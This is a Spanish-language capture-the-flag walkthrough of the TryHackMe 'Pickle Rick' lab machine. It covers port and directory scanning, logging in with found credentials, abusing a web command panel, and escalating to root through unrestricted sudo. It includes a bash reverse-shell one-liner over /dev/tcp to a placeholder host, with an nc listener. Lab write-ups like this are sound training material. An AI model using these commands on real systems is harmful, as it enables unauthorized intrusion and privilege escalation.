Pickle Rick es un nivel facil de la plataforma TryHackMe de nivel fácil. En esta máquina se tocan temas de WebHacking.
Primero hacemos un escaneo de puertos con nmap.
nmap -p- --open --min-rate 5000 -n -Pn -vvv 10.10.147.169 -oN escaneo
si tienen dudas sobre que hace cada parametro aquí se los explico:
Este escaneo nos muestra que la máquina tiene abiertos los puertos: 80(http) y 22(ssh).
Entramos a la página y hacemos un poco de exploración.
La página es muy sencilla por lo que nos brincamos directo a inspeccionar el código fuente, ahí encontramos algo muy interesante ¡un usuario!
Una vez encontrado el usuario exploramos algunas rutas que siempre son de interes como robots.txt
y sitemaps.xml
. Al parecer no existe el archivo sitemaps pero dentro de robots encontramos un mensaje un poco extraño que guardaremos para después.
Para esta etapa usaremos gobuster, buscaremos subdominios interesantes y archivos con extensiones .php, .html y .txt
gobuster dir -u http://10.10.147.169 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
De los resultados más interesantes es el panel de login, en el cual intentamos ingresar utilizando el usuario R1ckRul3s
y de contaseña Wubbalubbadubdub
¡¡Funcionó!!
Dentro del panel nos encontramos con un panell de comandos. Le ingresamos el comando whoami
para probar si funciona.
Como se ve en la imagen, el comando funcionó. Ahora nos intentamos enviar una reverse shell para trabajar un poco más comodos desde la terminal.
bash -c "sh -i >& /dev/tcp/<IP Victima>/<puerto> 0>&1"
No olviden ponerse en escucha para poder recibir la reverse shell:
sudo nc -lnvp <puerto>
Una vez recibida la shell exploramos archivos y vemos los primeros archivos interesantes en la ruta de /var/www/html
.
El primer archivo interesante es Sup3rS3cretPickl3Ingred.txt
en el cual esta el primer ingrediente que estamos buscando. El segundo archivo es clue.txt
en el cual solo nos indican que tenemos que explorar en los demás archivos.
El primer lugar en el que buscamos es en la ruta del usuario rick /home/rick/
y justo encontramos lo que buscabamos: second ingridients
.
Para el tercer ingrediente buscaremos en la directorio /root
pero primero necesitaremos escalar privilegios. Para esto ejecutamos el siguiente comando:
sudo -l
Este comando nos sirve para listar los comandos que el usuario puede ejecutar como sudo.
Los resultados nos muestan que el usuario www-data
tiene permisos para ejecutar cualquier comando como sudo.
Podemos escalar privilegios simplemente ejecutando el comando sudo su
, después vamoms a la ruta /root
en donde se encuentra el tercer ingrediente.
Y con esto logramos todos los objetivos de la máquina.
¡Saludos!